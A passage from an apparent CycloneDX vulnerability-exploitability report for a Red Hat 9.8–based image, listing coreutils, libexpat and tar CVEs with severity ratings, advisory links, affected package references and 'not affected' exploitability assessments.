          "url": "https://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=b60a159fdc5bfcf9988d3a4cb6f53abe8ad5d35d"
        },
        {
          "url": "https://github.com/advisories/GHSA-g24f-m2hx-pfgx"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56392"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56392"
        }
      ],
      "published": "2026-07-24T09:16:25+00:00",
      "updated": "2026-07-30T16:28:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "8.32-41.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2026-56403",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "libexpat before 2.8.2 has an integer overflow in storeAtts.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56403"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56403"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1232"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56403"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56403"
        }
      ],
      "published": "2026-06-21T16:16:26+00:00",
      "updated": "2026-06-23T20:15:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56405",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "libexpat before 2.8.2 has an integer overflow in getAttributeId.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56405"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56405"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1251"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56405"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56405"
        }
      ],
      "published": "2026-06-21T16:16:27+00:00",
      "updated": "2026-06-23T20:14:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56406",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "libexpat before 2.8.2 has an integer overflow in XML_ParseBuffer because it lacked a check that was present in XML_Parse.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56406"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56406"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1255"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56406"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56406"
        }
      ],
      "published": "2026-06-21T16:16:27+00:00",
      "updated": "2026-06-23T16:29:06+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56412",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        416
      ],
      "description": "libexpat before 2.8.2 does not consider XML_TOK_DATA_CHARS in doCdataSection and thus lacks handler call depth tracking for various calls from within handlers in cases of a policy violation. Thus, a use-after-free can occur. NOTE: this issue exists because of an incomplete fix for CVE-2026-50219.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56412"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56412"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1278"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56412"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56412"
        }
      ],
      "published": "2026-06-21T17:16:44+00:00",
      "updated": "2026-06-23T15:31:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5704",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        434
      ],
      "description": "A flaw was found in tar. A remote attacker could exploit this vulnerability by crafting a malicious archive, leading to hidden file injection with fully attacker-controlled content. This bypasses pre-extraction inspection mechanisms, potentially allowing an attacker to introduce malicious files onto a system without detection.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5704"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/11/10"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/11/11"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/12/2"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5704"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455360"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5704"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8477-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8477-2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8477-3"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5704"
        }
      ],
      "published": "2026-04-06T16:16:42+00:00",
      "updated": "2026-06-17T10:59:31+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.34-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
